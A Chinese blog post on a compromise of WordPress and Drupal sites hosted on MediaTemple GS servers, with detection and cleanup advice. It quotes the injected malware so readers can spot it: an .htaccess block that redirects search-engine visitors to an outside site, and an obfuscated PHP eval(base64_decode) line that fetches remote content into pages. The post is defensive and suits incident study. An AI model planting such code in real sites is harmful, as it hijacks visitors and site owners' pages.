MediaTemple GS主机被入侵

从订阅的一些国外博客可以看到,部分存放在MediaTemple GS 主机上的 WordPress 和Drupal有被入侵的痕迹,只对 MediaTemple 的GS主机,其他的DV等主机都没问题。

1、查看有没有被入侵的痕迹

查看根目录下的PHP文件,.htaccess和robots.txt,根据国外一个Blogger的描述,被入侵的.htaccess文件会多下面的一段代码:

RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [NC]
RewriteRule .* http://allvideo.org.uk/in.cgi?4&parameter=sf [R,L]

根据 MediaTempleKB上描述,php文件上会多下面的一段代码:

<!--5edfgh345--><?php eval(base64_decode("JGw9Imh0dHA6Ly90b3VycmV2aWV3cy5hc2lhL2xpbmtzMi9saW5rLnBocCI7IGlmIChleHRlbnNpb25fbG9hZGVkKCJjdXJsIikpeyANCiRjaCA9IGN1cmxfaW5pdCgpOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgMzApOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOyANCmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICRsKTsgJHIgPSBjdXJsX2V4ZWMoJGNoKTsgY3VybF9jbG9zZSgkY2gpO30NCmVsc2V7JHI9aW1wbG9kZSgiIixmaWxlKCRsKSk7fSBwcmludCBAJHI7DQo=")); ?> 

2、解决办法

打开PHP文件,.htaccess和robots.txt这几个文件,看看有没有可疑的代码,如果有,立即删除。并且更改FTP/SSH的密码。

update:MediaTemple在自己的博客上发表了几篇日志

3、总结

我在 MediaTemple 也有安装 WordPress ,但是比较少用,我刚刚登上去瞄了一下,发现没被入侵,这次入侵应该是针对部分的用户。如果你的 WordPress 或者 Drupal存放在 MediaTemple 上的话,最好去检查一下。

3 Comments

  1. 其实我觉得MediaTemple还算不错的,使用几个月了,没啥问题,速度也很快!唯一的问题就是太贵了点。